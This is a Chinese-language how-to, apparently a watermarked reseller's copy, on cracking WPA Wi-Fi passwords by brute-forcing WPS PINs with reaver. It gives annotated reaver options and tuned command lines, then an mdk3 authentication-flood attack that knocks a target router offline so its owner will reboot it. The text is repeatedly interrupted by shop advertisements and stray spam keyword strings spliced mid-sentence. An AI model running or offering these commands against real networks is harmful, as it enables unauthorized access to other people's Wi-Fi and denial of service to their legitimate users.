技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
破解WPA时,PIN出现死循环处理方法。
如下面这个例子,一开始,或者破解一段时间后出来PIN无限循环:
本人经过多次实验最后总结了解决的办法:
Required Arguments:
-i, --interface=
Name of the monitor-mode interface to use
网卡的监视接口,通常是mon0
-b, --bssid= BSSID of the target AP
AP的 MAC地址
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
Optional Arguments:
-m, --mac= MAC of the host system
指定本机 MAC地址,在 AP有 MAC过滤的时候需要使用
-e, --essid= ESSID of the target AP
路由器的 ESSID,一般不用指定
-c, --channel= Set the 802.11 channel for the interface (implies -f)
信号的频道,如果不指定会自动扫描
-o, --out-file= Send output to a log file [stdout]
标准
excel标准偏差excel标准偏差函数exl标准差函数国标检验抽样标准表免费下载红头文件格式标准下载
输出到文件
-s, --session= Restore a previous session file
恢复进程文件
-C, --exec= Execute the supplied command upon successful pin recovery
pin成功后执行命令
-D, --daemonize Daemonize reaver
设置 reaver成 Daemon
-a, --auto Auto detect the best advanced options for the target AP
对目标 AP自动检测高级参数
-f, --fixed Disable channel hopping
禁止频道跳转
-5, --5ghz Use 5GHz 802.11 channels
使用 5G频道
-v, --verbose Display non-critical warnings (-vv for more)
显示不重要警告信息 -vv 可以显示更多
-q, --quiet Only display critical messages
只显示关键信息
-h, --help Show help
显示帮助
Advanced Options:
-p, --pin= Use the specified 4 or 8 digit WPS pin
直接读取 psk(本人测试未成功,建议用网卡自带软件获取)
-d, --delay= Set the delay between pin attempts [1]
pin间延时,默认 1秒,推荐设 0
-l, --lock-delay= Set the time to wait if the AP locks WPS pin attempts [60]
AP锁定WPS后等待时间
-g, --max-attempts= Quit after num pin attempts
最大 pin次数
-x, --fail-wait= Set the time to sleep after 10 unexpected failures [0]
10次意外失败后等待时间,默认 0秒
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
-r, --recurring-delay= Sleep for y seconds every x pin attempts
每 x次 pin后等待 y秒
-t, --timeout= Set the receive timeout period [5]
收包超时,默认 5秒
-T, --m57-timeout= Set the M5/M7 timeout period [0.20]
M5/M7超时,默认 0.2秒
-A, --no-associate Do not associate with the AP (association must be done by another
application)
不连入 AP(连入过程必须有其他程序完成)
-N, --no-nacks Do not send NACK messages when out of order packets are received
不发送 NACK信息(如果一直 pin不动,可以尝试这个参数)
-S, --dh-small Use small DH keys to improve crack speed
使用小 DH关键值提高速度(推荐使用)
-L, --ignore-locks Ignore locked state reported by the target AP
忽略目标 AP
报告
软件系统测试报告下载sgs报告如何下载关于路面塌陷情况报告535n,sgs报告怎么下载竣工报告下载
的锁定状态
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
每当收到 EAP失败包就终止WPS进程
-n, --nack Target AP always sends a NACK [Auto]
对目标 AP总是发送 NACK,默认自动
-w, --win7 Mimic a Windows 7 registrar [False]
模拟 win7注册,默认关闭
------个人心得---------------------------------------------------------
对一个 ap刚开始 pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续 pin,反正进
度是可以保存的
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S
如果一直 pin不动,尝试加-N参数
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S –N
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
AP洪水攻击
1、打气筒 mdk3攻击模式操作方法
首先检测网卡:
ifconfig -a
然后模拟端口:
airmon-ng start wlan0
接下来用:
airodump-ng mon0
扫描 ap找到你 pin死的路由器mac
用mdk3 做身份验证攻击
mdk3 mon0 a -a mac(被 pin死的路由器的mac)
身份验证攻击效果说明:
此攻击是针对无线 AP 的洪水攻击,又叫做身份验证攻击。其原理就是向 AP 发动大量的虚假
的链接请求,这种请求数量一旦超 过了无线 AP所能承受的范围,AP就会自动断开现有链接,
使合法用户无法使用无线网络。迫使路由主人重启路由器。
说明:
此命令功能强大,使用错误会造成所有 ap 不能使用,请指定 mac 地址,然后使用,其余命
令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解
2、CDlinux mdk3攻击模式操作方法
首先进入 CDlinux,打开水滴或者打气筒搜索 pin死的 MAC地址(直接打开螃蟹或者 3070驱动搜索无线 MAC
地址也 OK)。
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
然后点击左下角 CDlnux图标,依次打开 无线安全--------mdk3-v6
进入 mdk3后输入命令 mdk3 mon0 a -a 40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你 pin死的路由的 MAC,
注意空格和大小写)
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
回车后进入攻击模式,时间不要太长,最多半分钟就可以关闭对话框然后重新扫描网络看 pin 死的路由是
不是已经不在了。等待主人重启吧~~~
非 CDLinux可以在这里启动命令输入框
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
注意:
1、只有客户端在线时进行攻击才可能达到迫使重启目的,信号越强,效果越佳。
2、每次攻击最好不超 5min,否则卡死(看机器配置),稍停 1min在进行攻击,连续攻击三
次应该就可以了!
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
8C210A pin重码或者pin死路由器的解决办法(我验证貌似有效)
看看我重码拼死后,的时候
拼死路由器后,整整一晚上没有在找到这个信号,今天起床在看,发现又出来了,继续拼, 发现,重码非常非
常的严重,今天中午放弃 N次,今晚在小试一下,加了参数后,大减少重码,坚持就是胜利,往下看。
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
看到了吧,重码,不过,是偶偶的了,加了参数后,不会像昨天和今天上午那样,一直重码一个码不动了.在往
下看,奇迹出现了。
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
Pin码重复出现死循环解决办法
1. xiaopanOS环境解决之道:
当你看到 PIN到一定程度,窗口里的 PIN码不变、进度百分比也不走,那么,保持原窗口不变,再点击
ROOTSHELL图标,新开一个 PIN窗口,输入 reaver -i mon0 -b 正在 PIN的 MAC -a -s -vv (注意:这里
“S”要小写) 那么,你就会发现原来 PIN的窗口,PIN码开始改变,进度开始前进了!而且 PIN的时间也
大为缩短了!如果是 PJ到 99.99%,执行此部操作就马上弹出正确的 pin码和 wifi密码,以及路由器的 SSID
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
PIN码和密码。
技术宅 QQ 766383076
淘宝店铺 http://shop107279844.taobao.com/?spm=0.0.0.0.7cw14M&v=1
主营 WORD PDF 视频 EXE软件 加密 解密
无线网安全 QQ使用技巧
系统重装,封装系统
虚拟机运行各种操作系统
视频,音频后期编辑等等
pin过程中解决 90.9%和 99.9%死循环的实践,证明非常有效。
pin到 90.9%死循环,说明前四位已经 pin完,但是没出;原因大概就是 AP没发出确认信息,reaver就已经
跳过了,从而错过了正确前四位的确认。
pin到 99.9%死循环,说明后四位的前三已经跑完,但是没出。原因同上。
经过实践,已经找到原因所在,
论坛里 的方法,大概 MAC 后跟的后缀都是 -vv -a -S,然而,殊不知,这样的后缀虽然可以加快速度,但
是,也有可能会错过正确前四等的确认。
所以,不放过每一次确认信息的表达式是
reaver -i mon0 -b MAC -v -a -n ,其他的就不用了。还可以加一个 -c。
基本从我遇到 90.9%和 99.9%的死循环的实践来看,已经 100%成功了。
pin过程中解决90.9%和99.9%死循环的实践,证明非常有效。